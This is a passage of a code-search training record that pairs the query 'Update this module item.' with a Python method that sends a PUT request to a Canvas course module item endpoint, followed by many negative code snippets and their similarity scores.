Second stage is locked.\")\n stage_2_num = 0\n if stage_1_num > 0 or stage_2_num > 0:\n while stage_1_num > 0 and self.stages > 0:\n stage_1_num = self.start_stage(self.stage_1_ui, stage_1_num, farm_shifter_bios=farm_shifter_bios)\n self.stages = stage_1_num + stage_2_num\n if stage_2_num > 0 and self.game.is_main_menu():\n self.game.select_mode(self.mode_name)\n while stage_2_num > 0 and self.stages > 0:\n stage_2_num = self.start_stage(self.stage_2_ui, stage_2_num, farm_shifter_bios=farm_shifter_bios)\n self.stages = stage_1_num + stage_2_num\n logger.info(f\"No more stages for {self.mode_name}.\")", "def _Freeze(self) -> None:\n self._SetNodes(_FROZEN_NODE_COUNT)", "def setLocked( self, state = True ):\n self._xLocked = state\n self._yLocked = state", "def disable_modulation(self):\n self.write(\":OUTPUT:MOD OFF;\")\n self.write(\":lfo:stat off;\")", "def inc_gains_of_free_cells(self):\r\n for cell in self.cells:\r\n if not cell.locked:\r\n cell.gain += 1\r\n cell.yank()", "def freeze(self):\n self.collect_params().setattr('grad_req', 'null')", "def set_Off(self):\n if not(self._locked):\n self.__dict__['statusOn']=False\n self._undo_action()\n else:\n self._log.info('The JobProperty %s is blocked', self.__name__)" ]
[ "0.56739426", "0.55922395", "0.54264724", "0.53600764", "0.5354496", "0.5268627", "0.52453303", "0.52251", "0.5195594", "0.51758677", "0.5144368", "0.5074577", "0.506353", "0.50520587", "0.5046629", "0.5009405", "0.50016654", "0.49919286", "0.49919286", "0.49131522", "0.49008468", "0.48860592", "0.47766253", "0.47643182", "0.47566563", "0.47456777", "0.4719795", "0.47193813", "0.47183213", "0.47146803", "0.47106808", "0.47042552", "0.46880066", "0.46855116", "0.4682114", "0.4680163", "0.46735272", "0.46708822", "0.4670617", "0.4668989", "0.4650948", "0.46490896", "0.4648243", "0.46457285", "0.46456617", "0.4644439", "0.4641167", "0.4631578", "0.4630395", "0.46207818", "0.46181202", "0.46123257", "0.46117914", "0.45985734", "0.45985496", "0.45944244", "0.45891112", "0.45891112", "0.45848584", "0.45831156", "0.45773694", "0.4577029", "0.4574496", "0.45688248", "0.45640272", "0.45639682", "0.4555161", "0.45458534", "0.45454493", "0.45444936", "0.4543875", "0.45429233", "0.4537699", "0.45355576", "0.45278317", "0.45246187", "0.45205337", "0.4518643", "0.45179698", "0.4513348", "0.45132947", "0.45113197", "0.45075968", "0.44930777", "0.44877598", "0.4480424", "0.44802004", "0.44799978", "0.44757584", "0.44722912", "0.44698665", "0.4469157", "0.44591728", "0.4457497", "0.44561046", "0.44509867", "0.44495946", "0.44480392", "0.44421744", "0.44409412" ]
0.5340079
5
Mark this module item as done.
def complete(self, **kwargs):
        response = self._requester.request(
            "PUT",
            "courses/{}/modules/{}/items/{}/done".format(
                self.course_id, self.module_id, self.id
            ),
            _kwargs=combine_kwargs(**kwargs),
        )
        module_item_json = response.json()
        module_item_json.update({"course_id": self.course_id})

        return ModuleItem(self._requester, module_item_json)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mark_as_done(self):\n self.status = \"DONE\"", "def mark_as_done(self, task):\n raise NotImplementedError('')", "def item_done(self, rsp=None):\n self.export.item_done(rsp)", "def mark_as_done(self):\n\n done = self.in_progress_scroll_cell.get()\n if done is None:\n self.master.show_error_popup('No Item', 'There is no item in the list to mark as done')\n return\n self.in_progress_scroll_cell.remove_selected_item()\n self.done_scroll_cell.add_item(done)", "def task_done(self):\n self.__data[\"status\"] = TASK.DONE # Set status done for task\n self.__data[\"eor\"] = time.time() # Update last end of run\n self.task_changed([\"status\", \"eor\"]) # Send changed event", "def action_set_done(self):\n self.ensure_one()\n self.write({\"state\": \"done\"})\n self.credit_control_line_ids.write({\"state\": \"done\"})\n return True", "def item_done(self, rsp=None):\n if self.current_item is None:\n raise error_classes.UVMSequenceError(\"You must call get_next_item before calling item_done\")\n\n with self.current_item.finish_condition:\n self.current_item.finish_condition.notify_all()\n self.current_item = None\n if rsp is not None:\n self.put_response(rsp)", "def finish_todo(self, todo):\n self.updated_items.append(todo._replace(done=True))\n print 'completed \"%s\"' % todo.text", "def setToFinish(self):\n self.finish = True", "def action_done(self):\n if not self.date_done:\n self.date_done = fields.Datetime.now()\n if self.state_rapel == '1':\n self.generate_rapel()\n self.state = 'done'", "def task_done(self, done, **kwargs):\n\n # If unknown task, kill execution\n if done not in self.doing:\n return\n\n # Set the task as completed\n self.done.append(self.doing.pop(self.doing.index(done)))\n\n # Call original method\n super(Queue, self).task_done(**kwargs)\n\n # Stop\n return", "def completed(self, completed):\n\n self._completed = completed", "def completed(self, completed):\n\n self._completed = completed", "def completed(self, completed):\n\n self._completed = completed", "def done(self):\n self.status = 'completed'\n self.end = datetime.datetime.now()\n self.save()", "def set_task_finished(self):\n self.busy = False", "def done_action(self) -> None:\n self.end = datetime.now()", "def mark_as_done(self):\n if self.can_mark_as_done():\n return self.__set_completion_status(True)\n return False", "def complete_todo(self, todo: Todo):\n todo.completed = True\n self.todo_client.put_todo(todo)", "def task_done(self):\n\t\ttry:\n\t\t\tself.logger.debug('Im trying mark queue job item as done')\n\t\t\tself.queue.task_done()\n\t\t\tself.logger.debug('Queue job item mark as done')\n\t\t\treturn True\n\t\texcept ValueError, e:\n\t\t\tself.logger.error('Error method task_done, error: %s'%(e),exc_info=True)\n\t\t\treturn False", "def finish(self):\n with self._lock: # just to be tidy; lock not really needed to set a boolean\n self._done = True", "def task_done(self) -> None:\n pass", "def mark_as_done(self):\n grade_event = {'value': self.points, 'max_value': self.points}\n self.runtime.publish(self, 'grade', grade_event)", "def force_done(self):\n\n if self.can_done():\n return self.done()\n else:\n # we can not set that quest to done regularly, so we force it\n # nobody gets any experience and we might need a special notification for this\n self.quest.done = True\n self.quest.save()\n signals.quest_done.send(None, quest=self.quest)", "def action_done(self):\n pass", "def _do_done(self, event):\n self._done(event.result)", "def _do_done(self, event):\n self._done(event.result)", "def 
mark_chunk_completed(self, chunk):\n self._chunk_done[chunk] = True\n if self.is_completed:\n self.completed.trigger()\n self.close()\n self.chunk_completed.trigger(chunk)", "def finish(self):\r\n\r\n self._is_finished = True", "def test_done_value_can_be_set_to_True(self):\n item = Item(name = \"A test item\", done = True)\n self.assertEqual(item.name, \"A test item\")\n self.assertTrue(item.done)", "def done(self):\n raise NotImplementedError()", "def Done(self):\n pass", "def set_task_done(self):\n\n tasks = self._get_all_tasks()\n\n task_id = tasks[self.tasks_view.currentRow()].Id\n\n self.tasks_flow.set_status(task_id, 0)\n\n # Refresh the table\n self.write_tasks_table()", "def subjectDone(self, subject):\n self._serialized[subject] = True", "def task_done(self):\n if hasattr(self._input, \"task_done\"):\n self._input.task_done()", "def _done(self):\n self._doneFlag = True\n self._executionCompletedNotifier.notify(self)", "def complete(self):\n self._is_complete = True", "def declareDone(self, cmd):\n pass", "def done(self):\n self._ready.clear()\n self._done.set()", "def set_done(self):\n self._set_new_trajectory()", "def _is_done(self):\n pass", "def action_done(self):\n if self._context is None:\n context = {}\n\n self.action_date_ret()\n self.action_number()\n self.action_move_create()\n\n return self.write( {'state': 'done'})", "def done(self):\n self.__queue.task_done()", "def task_done(self):\r\n if self._unfinished_tasks <= 0:\r\n raise ValueError('task_done() called too many times')\r\n self._unfinished_tasks -= 1\r\n if self._unfinished_tasks == 0:\r\n self._finished.set()", "def assert_done(self, task):\n if task not in self.tasks_done:\n # do the task if not done\n method = getattr(self, task)\n method()", "def task_done(self):\n self._queue.task_done()", "def done(self) -> bool:\n return self._done", "def action_done(self):\n root = self.generate_txt()\n self._write_attachment(root)\n self.write({'state': 'done'})\n\n return True", "def task_done(self) -> None:\n if self._unfinished_tasks <= 0:\n raise ValueError(\"task_done() called too many times\")\n self._unfinished_tasks -= 1\n if self._unfinished_tasks == 0:\n self._finished.set()", "def done(self) -> bool:\n return pulumi.get(self, \"done\")", "def _update_done(self) -> None:\n if None not in (self._last_readback, self._last_setpoint):\n is_done = self.done_comparator(self._last_readback, self._last_setpoint)\n done_value = int(is_done)\n if done_value != self.done.get():\n self.done.put(done_value, internal=True)", "def done(): #py:done\n RUR._done_()", "def onDone(self):\n pass", "def is_done(self):\n return self._done", "def do_done(self, arg):\n task = self.db.get_active_task()\n if not task:\n print('There is not an active task.')\n return\n finished = self.db.finish_track(task['track_id'], task['started'])\n rounding = ''\n if config.BT_TIMESHEET_ROUNDING and config.BT_ROUNDING_INCREMENT:\n rounding = \" and rounded to the next %s minute(s)\" % \\\n config.BT_ROUNDING_INCREMENT\n print(u\"The task '{task}#{project}' has been done. 
{activity} was spent\"\n \"{rounding}.\".format(\n task=task['tname'], project=task['pname'],\n activity=helpers.seconds_to_human(\n (finished - task['started']).total_seconds()),\n rounding=rounding\n )\n )\n self.set_prompt(self.bloody_prompt)", "def set_goal_done(self):\n self.has_goal = False\n self.last_goal_wait = False", "def done(self):\n return self._is_done", "def complete(self):\n self.completed = peewee.datetime.date.today()\n self.save()", "def done(self, request):\n raise NotImplementedError(\"Your %s class has not defined a done() \" \\\n \"method, which is required.\" \\\n % self.__class__.__name__)", "def done(self):", "def done(self):", "def done(self, changed: black.Changed) -> None:\n if changed is black.Changed.YES:\n self.change_count += 1\n else:\n self.same_count += 1", "def complete(self, item, line_reference, status):\n self.job.complete(item, line_reference, status)", "def action_done(self, payroll):\n self.payroll_id = payroll\n self.date_done = payroll.date_payroll\n self.state = 'done'", "def action_done(self, payroll):\n self.payroll_id = payroll\n self.date_done = payroll.date_payroll\n self.state = 'done'", "def done(self):\n return False", "def _process_finished(self, process):\n self._state = JobState.FINISHED", "def done(self):\n return self._info['status'] == 'DONE'", "def done(self) -> bool:", "def DoneWithId(self, id):\n self.ids.add(id)", "def mark_quiz_complete(self):\n self.end = now()\n self.complete=True\n self.save()", "def set_completed(self, result: str = None):\n self._has_run = True\n self.exp_metadata.result = result\n self.exp_metadata.status = ExperimentState.COMPLETED\n\n self._finish_exp_run()", "def done(self):\n pass", "def set_test_done(self, test_guid):\n DelayedTestStorage.set_delayed_test_to_done(test_guid)\n return True", "def done(self):\n self._flush()", "def done(self, *a, **kw):\n raise NotImplementedError", "def set_delayed_test_to_done(self, guid_):\n db = DatabaseManager()\n query = \"\"\"UPDATE delayedTestData\n SET done=TRUE\n WHERE guid=%(guid)s\n AND done=FALSE\"\"\"\n db.execute_query_and_close(query, {\"guid\": guid_})\n return True", "def done(self):\n self.add_report(self.doc)\n self.timestamp(\"done\")", "def finish(self, id, result=NO_RESULT):\n def _finish(pipe):\n if pipe.zrank(self.feed_claimed, id) is None:\n return # raise exception?\n pipe.multi()\n pipe.zrem(self.feed_claimed, id)\n pipe.hdel(self.feed_cancelled, id)\n pipe.zrem(self.feed_published, id)\n pipe.incr(self.feed_finishes)\n if result is not self.NO_RESULT:\n self.thoonk._publish(self.job_finish, (id, result), pipe)\n pipe.hdel(self.feed_items, id)\n \n self.redis.transaction(_finish, self.feed_claimed)", "def order_finish(self):\r\n logger.info(f'Remaining qty:{self.quantity-self.filled_quantity}')\r\n self.is_active = False\r\n self.is_finished = True\r\n self.is_trading = False\r\n schedule.clear(tag=self.id)\r\n logger.info(f'Order {self.id} is finished')", "def finished(self):\n pass", "def done(self):\n return self._done.get()", "def episode_done(self):\n if self.get_status() == AssignState.STATUS_DONE:\n return False\n else:\n return True", "def markSuccess(self, *args):\n self.add(True)", "def finished(self):\n\t\telog(\"finished\")", "def finishRecipe(self):\r\n self.completeRecipe = self.actualRecipeThread\r\n self.actualRecipeThread = None", "def action_done(self):", "def mod_complete(self):\n raise NotImplementedError(\"Mod complete isn't overriden\")", "def update_done(self, scan_id):\n pass", "def tellDone(self, success, 
originatorId):\n self.jobSender.send(self.jobSender.createJobDoneEvent(self.name,\n success,\n originatorId))", "def archive_done(self):\n if self.item_goal_nitems != 0:\n self.archive_output_done()\n\n if self.item_cur_nitems != self.item_goal_nitems:\n logger.error(\"\\nExpected %s files, archived %s files \"\n \"instead.\" % (self.item_goal_nitems,\n self.item_cur_nitems))\n if self.item_cur_nbytes != self.item_goal_nbytes:\n logger.error(\"\\nExpected %s bytes, archived %s bytes \"\n \"instead.\" % (self.item_goal_nbytes,\n self.item_cur_nbytes))\n\n assert self.item_cur_nitems == self.item_goal_nitems\n assert self.item_cur_nbytes == self.item_goal_nbytes", "def is_done():\n return False", "def complete(self):\n pass", "def test_mark_completed(self):\n event = Event.objects.all()[0]\n\n todo = TodoItem.objects.create(\n event=event, completed=False, title=\"Test TODO1\",\n due=datetime.date.today(), additional=\"\",\n )\n\n assert todo.completed is False\n\n self.client.get(reverse('todo_mark_completed', args=[todo.pk]))\n todo.refresh_from_db()\n\n assert todo.completed is True", "def mark_complete(todo_list):\r\n item = select_item(todo_list, \"Please enter the item number you wish to \"\r\n \"Mark Completed and hide from the \"\r\n \"list\\nEnter a negative number or zero to \"\r\n \"cancel\")\r\n if item >= 0:\r\n todo_list[item].visible = False\r\n return", "def teleportInDone(self):\n self.notify.debug(\"teleportInDone\")\n self.toonSubmerged = -1\n if self.nextState is not 'petTutorial':\n self.notify.info(\"add estate-check-toon-underwater to TaskMgr in teleportInDone()\")\n if hasattr(self, 'fsm'):\n taskMgr.add(self.__checkToonUnderwater, 'estate-check-toon-underwater')\n Place.Place.teleportInDone(self)", "def quit_game(self):\n self.done = True", "def jobComplete(self):\n self._Finished = True\n return", "def _success_finish(self):\n # run this task after scrapy process successfully finished\n # cache result, if there is at least one scraped item\n time.sleep(2) # let the data to be dumped into the output file?\n self._update_items_scraped()\n if self.items_scraped:\n self.save_cached_result()\n else:\n logger.warning('Not caching result for task %s (%s) '\n 'due to no scraped items.',\n self.task_data.get('task_id'),\n self.task_data.get('server_name'))\n logger.info('Success finish task #%s', self.task_data.get('task_id', 0))\n self.finished_ok = True", "def finished(self):\n self.update(self._total)" ]
[ "0.76290876", "0.7104358", "0.70515716", "0.70057595", "0.675455", "0.6700418", "0.6647", "0.65426934", "0.6470507", "0.64645696", "0.6429567", "0.64175504", "0.64175504", "0.64175504", "0.63983035", "0.6375131", "0.63530964", "0.630775", "0.62934726", "0.62571234", "0.62337446", "0.61975783", "0.61787903", "0.61662936", "0.61507696", "0.61033994", "0.61033994", "0.6088102", "0.6080167", "0.60641193", "0.6062565", "0.6050173", "0.6039471", "0.6035842", "0.6025023", "0.6009566", "0.60047114", "0.5981805", "0.59796906", "0.59615296", "0.5959899", "0.5949301", "0.59376866", "0.5923691", "0.5902073", "0.59005654", "0.5889307", "0.58838165", "0.5883066", "0.58679533", "0.5862333", "0.5831466", "0.582211", "0.57929367", "0.57800114", "0.5779882", "0.5775806", "0.5759354", "0.5758909", "0.5734711", "0.5734711", "0.57314634", "0.57295513", "0.5723601", "0.5723601", "0.5718335", "0.57164896", "0.570453", "0.5692362", "0.56880987", "0.56809103", "0.5679973", "0.5653304", "0.56403047", "0.5640245", "0.563928", "0.5616157", "0.56076956", "0.5602035", "0.55845886", "0.5576446", "0.5568738", "0.55674976", "0.5559148", "0.5533589", "0.55015254", "0.54924643", "0.549244", "0.5488148", "0.54858613", "0.54854715", "0.5475549", "0.5469822", "0.5466619", "0.54652685", "0.5463286", "0.54627234", "0.54608995", "0.54315686", "0.54255164" ]
0.6340129
17
Delete this module item.
def delete(self, **kwargs):
        response = self._requester.request(
            "DELETE",
            "courses/{}/modules/{}/items/{}".format(
                self.course_id, self.module_id, self.id
            ),
            _kwargs=combine_kwargs(**kwargs),
        )
        module_item_json = response.json()
        module_item_json.update({"course_id": self.course_id})

        return ModuleItem(self._requester, module_item_json)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __do_module_delete(item):\n\n file_path = DTF_MODULES_DIR + item.install_name\n\n if utils.delete_file(file_path) != 0:\n log.e(TAG, \"Error removing module file! Continuing.\")\n\n conn = sqlite3.connect(DTF_DB)\n cur = conn.cursor()\n\n # Remove the line first.\n sql = ('DELETE FROM modules '\n \"WHERE name='%s'\" % item.name)\n\n cur.execute(sql)\n conn.commit()\n\n return 0", "def delete(self):\r\n self.domain.delete_item(self)", "def delete(self):\n response = settings.database.delete_item(Key={'id': str(self.id)})\n raise_for_response(response)", "def delete_item(self):\n\n\t\tdb.session.delete(self)\n\t\tdb.session.commit()", "def delete(self):\n return self.items.delete(item_id=self.id)", "def delete(self, item):\n self._createAction(item, \"delete\")", "def delete(self):\n\n raise NotImplementedError('Must be implemented by subclasses')", "def delete(self):\n pass", "def delete(self):\n pass", "def delete(self):\n pass", "def delete(self):\n pass", "def delete(self):\n\n raise NotImplementedError()", "def _delete(self, item):\n self.cv.delete(item)", "def delete(self):\n self.manager.delete(self.name)", "def delete(self):\n self.manager.delete(self.name)", "def delete(self, item):\n # eg. node=item to attrs, telling item type to Graphviz._setattr\n self.graph._del(self.parent.handle, **{self.type: item})", "def delete(self):\n self.package = None", "def delete_item(self) -> None:\n item = self.get_selected_item(self.tree_cache)\n if item is None:\n return\n\n item.data().set_enabled(False)\n self.sync_tree_cache()", "def uncomplete(self, **kwargs):\n response = self._requester.request(\n \"DELETE\",\n \"courses/{}/modules/{}/items/{}/done\".format(\n self.course_id, self.module_id, self.id\n ),\n _kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def delete(self, itemId):\n\n table = self.__getTable()\n table.delete_item(itemId = itemId)", "def delete(self, *args, **kwargs):\n pass", "def delete(self, *args, **kwargs):\n pass", "def __delitem__(self,item):\n if item == self.lastKey: return\n installer = self.data[item]\n apath = self.dir.join(item)\n if isinstance(installer,InstallerProject):\n apath.rmtree(safety='Installers')\n else:\n apath.remove()\n del self.data[item]", "def delete(self):\n raise NotImplementedError", "def delete(self):\n ...", "def delete(self):\n return self.parent.delete_instance(self.name)", "def delete(self):\n os.system(\"rm \"+self._name)", "def remove(self):\n self._switch.odlclient._request(self._path, method=\"delete\")", "def delete(self):\n raise NotImplementedError()", "def delete(self):\n raise NotImplementedError()", "def __delitem__(self, key):\r\n self.client.delete(id=key, ignore=[404], **self.kwargs)", "def delete(self):\n self._client.delete(self)", "def delete_item(id: str):\n db.delete(id, kind=endpoint_model)\n return {\"result\": \"ok\"}", "def delete(self):\n self.manager.delete(self)", "def delete(self):\n return self.manager.delete(self)", "def __delitem__(self, key, *args, **kwargs):\n self._del(key, *args, **kwargs)", "def delete_item(self, location, user_id=None, **kwargs):\r\n course_id = location.course_key\r\n store = self._get_modulestore_for_courseid(course_id)\r\n return store.delete_item(location, user_id=user_id, **kwargs)", "def __delitem__(self, index: int) -> None:\n error = self._coreIndex.removeDescriptor(index)\n assertError(error)", "def delete(self):\n 
self.dbm().model_delete(self)", "def delete(self):\n items = ShopcartItem.find_by_shopcartid(self.id)\n\n for item in items:\n item.delete()\n\n db.session.delete(self)\n db.session.commit()", "def test_delete_item_using_delete(self):\n pass", "def delete(self, name):\n global items\n items = _Helper.all_item_except_searching_for(name)\n return {\"message\": f\"Item {name} deleted successfully\"}, 204", "def delete(self):\n del self.shx.atoms[self.index]", "def del_item(self, item):\n index = self.board[item.pos[0]][item.pos[1]].index(item)\n del self.board[item.pos[0]][item.pos[1]][index]", "def remove_item(self, idx_of_item):\n del self.items[idx_of_item]", "def delete_item(self):\n self.df_user.drop(self.index_select_number, inplace=True)\n self.df_user.to_csv(\"user_items.csv\", index=False)\n self.update_treeview()\n self.changing_item_label.config(text=\"Please double click on the item you want to edit.\")\n self.delete_but.destroy()\n self.serv_drop.destroy()\n self.serv_but.destroy()\n self.pop_up_del.destroy()", "def delete_item(self, id: str, user: User) -> bool:", "def __delitem__(self, index: Any) -> None:\n del self.contents[index]\n return", "def delete(self, type, id):\n path = self._get_path('delete').format(itemType=type, itemId=id)\n \n return self._DELETE(path)", "def delete(self):\n if self.iid is not None:\n self.db().remove(self.iid)", "def delete(self, box):\n boom = box.GetSelection()\n if boom == box.GetRootItem():\n return\n\n item_data = box.GetItemData(boom).GetData()\n\n if isinstance(item_data, data_types.ProductData):\n boom = box.GetItemParent(boom)\n item_data = box.GetItemData(boom).GetData()\n\n db = database.TransactionsDB()\n\n if box is self.list_sales:\n func = db.delete_sale\n sale.update_inventory(item_data, undo=True)\n elif box is self.list_expenses:\n func = db.delete_expense\n else:\n func = db.delete_waste\n waste.update_inventory(item_data, undo=True)\n\n func(item_data.ID)\n\n db.close()\n self.setup(None)", "def __delitem__(self, key):\n self.delete(key)", "def __delitem__(self, key):\n self.delete(key)", "def delete(self):\n return api.delete([self._key])", "def delete_item(self, item_id):\n # open a cursor\n cur = self.get_cursor()\n\n delete_item_statement = \"DELETE FROM transaction_items \" + \\\n \"WHERE transaction_item_id={0}\".format(item_id)\n\n cur.execute(delete_item_statement)\n\n # close the cursor\n self.close_cursor()", "def __delitem__(self, key):\n self.f_remove(key)", "def __delitem__(self, key):\n del self._get_storage()[key]", "def delete(self):\n # gid must be specified for deletion\n gid = self.get_query_argument('gid')\n self.write(self._rpc.aria2.remove(self._token, gid))", "def delete(self, *args, **kwargs):\n return 0", "def __delitem__(self, userid):\r\n self.removePlayer(userid)", "def delete(self):\n\n if not self.context.model.is_editable():\n raise Unauthorized(\"Editing is not allowed\")\n\n # the agenda_item is ad hoc if it has a document but no proposal\n if self.agenda_item.has_document and not self.agenda_item.has_proposal:\n document = self.agenda_item.resolve_document()\n trasher = ITrashable(document)\n trasher.trash()\n\n self.agenda_item.remove()\n\n return JSONResponse(self.request).info(\n _(u'agenda_item_deleted',\n default=u'Agenda Item Successfully deleted')).dump()", "def delete(self, *args, **kwargs) -> Any:\n pass", "def delete(self):\n # type: () -> BoundAction\n return self._client.delete(self)", "def __delitem__(self, package):\n\n\t\tdel self._packages[package]", "def delete(self, *args, 
**kwargs):\n raise NotImplementedError()", "def delete(self, *args, **kwargs):\n return self.handle_delete_request()", "def deleteRig(self):\n\n allNodes = cmds.ls(\"*\")\n for node in allNodes:\n if cmds.objExists(node + \".sourceModule\"):\n cmds.lockNode(node, lock=False)\n source = cmds.getAttr(node + \".sourceModule\")\n if source == self.name:\n try:\n cmds.delete(node)\n except:\n pass", "def delModule(name):", "def on_delete(action, item, view):\n actors.remove(action.actor)\n self.remove(item)", "def delete(self, _id):", "def on_deleteButton_clicked(self):\n itm = self.protocolHandlersList.selectedItems()[0]\n self.__manager.removeProtocolHandler(itm.text(0))\n \n self.protocolHandlersList.takeTopLevelItem(\n self.protocolHandlersList.indexOfTopLevelItem(itm))\n del itm", "def delete(self):\n raise exceptions.NotImplemented", "def remove(self, item: Item) -> None:\n raise NotImplementedError(\"remove\")", "def delete(self):\n DATABASE_CONNECTION.delete(self.__class__.__name__, self.id)", "def delete(self):\n self.current_revision.delete()", "def delete(self, name):\n\n pass", "def DeletePlaylist(self):\n os.remove(self.path)", "def delete_field(self):\n self.exec_command(b\"DeleteField\")", "def delete(self):\n\n # TODO find a way to remove this when sub-classing in HCRoot\n self.parent.del_child(self)", "def delete_item_by_id(self, id):\n response = self.table_connector.delete_item(Key={self.primary_key: id})\n print(response)", "def delete(self):\n self.request().delete()", "def delete(self, name=None):\n raise NotImplementedError", "def delete_item(id):\n return '', 201", "def delete(self, index):\n del self.data[index]", "def __delitem__(self, key):\n del self.list[key]", "def delete(self, application_id):", "def delete():", "def delRepoItem(self, key):\n\n ACCESS_TOKEN = initZenodo(self.hostDefn['localhost']['localSettings']/'zenodoSettings.dat')\n r = requests.delete('https://zenodo.org/api/deposit/depositions/%s' % self.nbDetails[key]['repoInfo']['id'],\n params={'access_token': ACCESS_TOKEN})\n if r.ok:\n print(f\"Item {self.nbDetails[key]['title']} deleted from repo.\")\n self.nbDetails[key]['repoInfo'] = None\n self.nbDetails[key]['doi'] = None\n else:\n print(f\"Failed to remove item {self.nbDetails[key]['title']}, code: {r.status_code}\")", "def delete(self):\n url = util.join_url(self.path, str(self['id']))\n new_attributes = self.api.delete(url)\n self.error = None\n self.merge(new_attributes)\n return self.success()", "def __do_library_delete(item):\n\n file_path = DTF_LIBRARIES_DIR + item.install_name\n\n if utils.delete_tree(file_path) != 0:\n log.e(TAG, \"Error removing tree! Continuing.\")\n\n conn = sqlite3.connect(DTF_DB)\n cur = conn.cursor()\n\n # Remove the line first.\n sql = ('DELETE FROM libraries '\n \"WHERE name='%s'\" % item.name)\n\n cur.execute(sql)\n conn.commit()\n\n return 0", "def delete(self):\n self._instance.delete()\n self._instance = None\n self._data_defs = []", "def delete(self, item_id, **params):\n\n self.queue('delete', item_id=item_id, **params)", "def cfDel(self, key, item):\n params = [key, item]\n\n return self.execute_command(self.CF_DEL, *params)", "def hdel(self):\n return self.delete()", "def delete_version(self):\n pass", "def __delitem__(self, key):\n pass", "def __delitem__(self, key):\n pass", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()" ]
[ "0.76490295", "0.76386184", "0.7293862", "0.7082898", "0.7029256", "0.7006791", "0.6655195", "0.66186965", "0.66186965", "0.66186965", "0.66186965", "0.6595931", "0.657923", "0.65764403", "0.65764403", "0.65596324", "0.65374285", "0.6532332", "0.65124965", "0.6511554", "0.6504799", "0.6504799", "0.64847076", "0.6469156", "0.6462438", "0.6453846", "0.6430069", "0.6428038", "0.63959616", "0.63959616", "0.6378007", "0.6365043", "0.63383144", "0.63283324", "0.62865865", "0.62723184", "0.62576586", "0.6256502", "0.6251777", "0.6245268", "0.6230858", "0.62262803", "0.62026924", "0.61892784", "0.6186102", "0.61792314", "0.61787647", "0.61740875", "0.6171415", "0.61712307", "0.6166127", "0.6144048", "0.6144048", "0.6141173", "0.6135955", "0.61335105", "0.61307114", "0.61205125", "0.61193794", "0.61189646", "0.6108568", "0.6107296", "0.6106686", "0.6101655", "0.6100314", "0.6098781", "0.60875124", "0.60603374", "0.6050973", "0.60391366", "0.6038312", "0.60355693", "0.6032106", "0.6028666", "0.6009965", "0.6004492", "0.60027975", "0.5995303", "0.59905094", "0.5990163", "0.59847105", "0.5977103", "0.5977094", "0.59747785", "0.5965476", "0.5963645", "0.59544545", "0.5954433", "0.5951811", "0.5951384", "0.5943433", "0.59374756", "0.5930736", "0.5930622", "0.59283066", "0.59251523", "0.59251523", "0.5923607", "0.5923607", "0.5923607" ]
0.7723441
0
Update this module item.
def edit(self, **kwargs):
    response = self._requester.request(
        "PUT",
        "courses/{}/modules/{}/items/{}".format(
            self.course_id, self.module_id, self.id
        ),
        _kwargs=combine_kwargs(**kwargs),
    )
    module_item_json = response.json()
    module_item_json.update({"course_id": self.course_id})

    return ModuleItem(self._requester, module_item_json)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def updateItem(self, object):\n pass", "def __update_module(item):\n\n conn = sqlite3.connect(DTF_DB)\n cur = conn.cursor()\n\n # Remove the line first.\n sql = ('DELETE FROM modules '\n \"WHERE name='%s'\" % item.name)\n\n cur.execute(sql)\n\n entry = [(item.name, item.about, item.version,\n item.author, item.install_name)]\n\n # Update a Module Entry\n sql = ('INSERT INTO modules (name, about, version, '\n 'author, install_name)'\n 'VALUES (?, ?, ?, ?, ?)')\n\n cur.executemany(sql, entry)\n conn.commit()\n\n return cur.rowcount", "def update(self, *args, **kwargs):\n pass", "def update(self, *args, **kwargs):\n pass", "def update(self, *args, **kwargs):\n pass", "def update(self):\n\n pass", "def update(self) -> None:\n pass", "def update(self) -> None:\n pass", "def update(self, **kwargs):\n self.manager.update(self, **kwargs)", "def update(self, **kwargs):\n self.manager.update(self, **kwargs)", "def update(self):\n raise NotImplementedError", "def update(self):\n\n raise NotImplementedError('Must be implemented by subclasses')", "def update(self):\n raise NotImplementedError()", "def update(self, *args, **kw):\n pass", "def update_item(self, table, item):", "def update(self) -> None:\n ...", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update_item(self, xblock, user_id, allow_not_found=False):\r\n course_id = xblock.scope_ids.usage_id.course_key\r\n store = self._get_modulestore_for_courseid(course_id)\r\n return store.update_item(xblock, user_id)", "def update(self):\n return self._process('update')", "def update(self, **kwargs):\n return self.manager.update(self, **kwargs)", "def update(self, **kwargs):\n return self.manager.update(self, **kwargs)", "def update(self, **kwargs):\n return self.manager.update(self, **kwargs)", "def update_item(self, id: str, user: User, **kwargs) -> None:", "def update(self, *args, **kwargs):\n raise NotImplementedError", "def update(self):\n ckresult(_dll.FMOD_System_Update(self._ptr))", "def update(cls) -> None:\n raise NotImplementedError", "def _update(self):\n pass", "def update(self):\r\n pass", "def update(self):\n self.attributes = self.call('UPDATE', expect=error.OK, body=self.attributes)", "def _update_item(self, item, user):\n item.user_modified = user\n try:\n item.panel = item.panel\n item.item_priority = item.priority\n except AttributeError:\n pass\n item.is_packed = True\n item.save()\n return item", "def update(self, **kwargs):\n return self.parent.update_instance(self.name, kwargs)", "def update_item(self, item):\n try:\n index = self.ui.listItemList.model().index_of(item)\n # TODO: missing a way to insert row, don't know how to add data with insertRows\n # see https://svn.enthought.com/svn/enthought/TraitsBackendQt/trunk/enthought/traits/ui/qt4/list_str_model.py\n #if item.isRead() and self.show_updated_only():\n # self.ui.listItemList.model().removeRow(index.row())\n #else:\n self.ui.listItemList.update(index)\n except:\n pass\n self.update_title()", "def complete(self, **kwargs):\n response = self._requester.request(\n \"PUT\",\n \"courses/{}/modules/{}/items/{}/done\".format(\n self.course_id, self.module_id, self.id\n ),\n 
